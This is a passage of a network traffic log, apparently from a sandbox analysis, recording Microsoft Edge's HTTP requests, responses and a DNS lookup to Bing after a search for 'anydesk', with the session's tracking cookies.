sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bb777b5c.1728144461.37debf9
GET

https://www.bing.com/images/sbi?mmasync=1&ig=4B36F2F1B3E84114BE48F204E3D5D175&iid=.5092&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /images/sbi?mmasync=1&ig=4B36F2F1B3E84114BE48F204E3D5D175&iid=.5092&ptn=Web&ep=0&iconpl=1 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 3285
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 6701644ece8544788126c13ce6871ce9
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-GMwqDan0IRVEN3tr0nYBVohYRTDNP5J7akikOTBIAv0='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:07:42 GMT
Connection: keep-alive
Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; domain=.bing.com; expires=Thu, 30-Oct-2025 16:07:42 GMT; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bb777b5c.1728144462.37dedd5
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:42 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bb777b5c.1728144462.37df52b
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461355%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461355%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bb777b5c.1728144463.37df690
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22RedemptionAnimationState%22%3A%22%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144462678%2C%22Name%22%3A%22AnimationLoad%22%7D%5D

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22RedemptionAnimationState%22%3A%22%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144462678%2C%22Name%22%3A%22AnimationLoad%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bb777b5c.1728144463.37dfaef
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.132:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 21235
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:44 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bb777b5c.1728144464.37dfe4d
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.146

e86303.dscx.akamaiedge.net

IN A

92.123.128.145

e86303.dscx.akamaiedge.net

IN A

92.123.128.138

e86303.dscx.akamaiedge.net

IN A

92.123.128.149

e86303.dscx.akamaiedge.net

IN A

92.123.128.148

e86303.dscx.akamaiedge.net

IN A

92.123.128.144

e86303.dscx.akamaiedge.net

IN A

92.123.128.140

e86303.dscx.akamaiedge.net

IN A

92.123.128.147

